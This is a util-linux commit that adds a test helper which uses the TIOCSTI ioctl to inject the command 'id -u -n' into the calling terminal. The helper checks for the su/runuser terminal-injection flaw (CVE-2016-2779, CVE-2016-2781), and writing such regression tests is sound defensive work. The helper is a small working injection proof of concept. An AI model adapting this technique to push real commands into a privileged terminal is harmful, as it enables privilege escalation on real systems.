tests: Add helper for TIOCSTI exploit

This helper/exploit injects "id -u -n\n" to the vulnerable calling terminal. Use id -u -n to get a reproducible output of test cases based on it. What can happen: Nothing, no exploit: pty is not accessible, sedsid() disconnected the task from pty, TIOCSTI failed. The command is injected to the unprivileged environment pty, and you see e. g. "nobody": This is acceptable. The command is injected to the caller (privileged) pty, and you see "root" (or caller uid name): This is not acceptable and has security implications. References: CVE-2016-2779 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2779 http://seclists.org/oss-sec/2016/q1/448 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=815922 https://bugzilla.redhat.com/show_bug.cgi?id=173008 https://bugzilla.suse.com/show_bug.cgi?id=968674 https://bugzilla.suse.com/show_bug.cgi?id=968675 CVE-2016-2781 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2781 http://seclists.org/oss-sec/2016/q1/452 Signed-off-by: Stanislav Brabec <sbrabec@suse.cz> Cc: Federico Bento <up201407890@alunos.dcc.fc.up.pt>
util-linux · Sep 29, 2016 · a0a8e98 · a0a8e98
1 parent 3e44e75
commit a0a8e98
Show file tree

Hide file tree

Showing 3 changed files with 32 additions and 0 deletions.
diff --git a/tests/commands.sh b/tests/commands.sh
@@ -32,6 +32,7 @@ TS_HELPER_SCRIPT="$top_builddir/test_script"
 TS_HELPER_SIGRECEIVE="$top_builddir/test_sigreceive"
 TS_HELPER_STRUTILS="$top_builddir/test_strutils"
 TS_HELPER_SYSINFO="$top_builddir/test_sysinfo"
+TS_HELPER_TIOCSTI="$top_builddir/test_tiocsti"
 TS_HELPER_UUID_PARSER="$top_builddir/test_uuid_parser"
 
 # paths to commands
@@ -75,6 +76,7 @@ TS_CMD_MOUNTPOINT=${TS_CMD_MOUNTPOINT:-"$top_builddir/mountpoint"}
 TS_CMD_NAMEI=${TS_CMD_NAMEI-"$top_builddir/namei"}
 TS_CMD_PARTX=${TS_CMD_PARTX-"$top_builddir/partx"}
 TS_CMD_RENAME=${TS_CMD_RENAME-"$top_builddir/rename"}
+TS_CMD_RUNUSER=${TS_CMD_RUNUSER-"$top_builddir/runuser"}
 TS_CMD_REV=${TS_CMD_REV:-"$top_builddir/rev"}
 TS_CMD_SCRIPT=${TS_CMD_SCRIPT-"$top_builddir/script"}
 TS_CMD_SCRIPTREPLAY=${TS_CMD_SCRIPTREPLAY-"$top_builddir/scriptreplay"}

diff --git a/tests/helpers/Makemodule.am b/tests/helpers/Makemodule.am
@@ -15,3 +15,6 @@ check_PROGRAMS += test_sigreceive
 test_sigreceive_SOURCES = tests/helpers/test_sigreceive.c
 test_sigreceive_LDADD = $(LDADD) libcommon.la
 
+check_PROGRAMS += test_tiocsti
+test_tiocsti_SOURCES = tests/helpers/test_tiocsti.c
+
diff --git a/tests/helpers/test_tiocsti.c b/tests/helpers/test_tiocsti.c
@@ -0,0 +1,27 @@
+/*
+ * test_tiocsti - test security of TIOCSTI
+ *
+ * Written by Federico Bento <up201407890@alunos.dcc.fc.up.pt>
+ *
+ * This program is free software; you can redistribute it and/or
+ * modify it under the terms of the GNU General Public License as
+ * published by the Free Software Foundation.
+ *
+ * This program is distributed in the hope that it would be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program; if not, write to the Free Software Foundation, Inc.,
+ * 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+ */
+
+#include <sys/ioctl.h>
+
+int main(void)
+{
+  char *cmd = "id -u -n\n";
+  while(*cmd)
+   ioctl(0, TIOCSTI, cmd++);
+}